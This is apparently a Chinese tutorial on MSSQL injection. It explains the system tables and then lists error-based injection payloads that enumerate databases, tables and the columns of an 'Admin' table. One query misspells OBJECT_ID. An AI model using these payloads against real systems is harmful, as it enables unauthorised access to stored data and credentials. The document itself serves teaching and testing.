SQL Server/MSSQL是美国microsoft公司推出的一种关系型数据库系统,是一个可扩散的,高性能的,为分布式客户机/服务器计算机所设计的数据库管理系统。
其主要特点如下:
(1)高性能设计,可充分利用WindowsNT的优势;
(2)系统管理先进,支持windows图形化管理工具;
(3)强壮的事物处理功能,采用各种方法保证数据的完整性
(4)支持对称多处理器结构,存储过程;
(5)数据库端口1433
MSSQL数据库注入-三张特殊表
sysdatabases–管理已经存在的数据库
(1)查看mssql中所有的数据库
select * from sysdatabases
(2)判断某个数据库是否存在
select * from sysdatabases where name=‘数据库名’
(3)统计数据库的总数
select count(*) as 数据库总数 from sysdatabases
sysobjects—管理已经存在的表
(1)查看数据库中所有的表格
select * from sysobjects
(2)查看用户自检创建所有的表格
select * from sysobjects where type=‘U’
(3)判断某个表格是否存在
select * from sysobjects where name=‘movie’
(4)统计表格总数
select count(*) 表格总数 from sysobjects
syscolumns—管理表中字段
(1)查看数据库中所有的字段
select * from syscolumns
(2)查看某张表中所有的字段
select * from syscolumns where id=OBJECT_ID(‘movie’)
查看某一字段是否存在
select * from syscolumns where id=OBJECTS(‘movie’) and name=‘type’
查看当前数据库 and 1=(select db_name())
查看当前数据库版本and 1=(select @@version)
查看到第一个数据库
and 1=(select top 1 name from master.dbo.sysdatabases where dbid=1)
查看所有的数据库
and 1=(select name from master.dbo.sysdatabases for xml path)
查看第一个表 and 1=(select top 1 name from sysobjects where xtype=‘u’)
第二个表
and 1=(select top 1 name from sysobjects where xtype='u' and name<>'Admin')
一次性爆出全部表名
and 1=(select name from sysobjects for xml path)
获取列明
and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name='Admin' ))
and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name=‘Admin’ and name<>‘第一个列名’ ))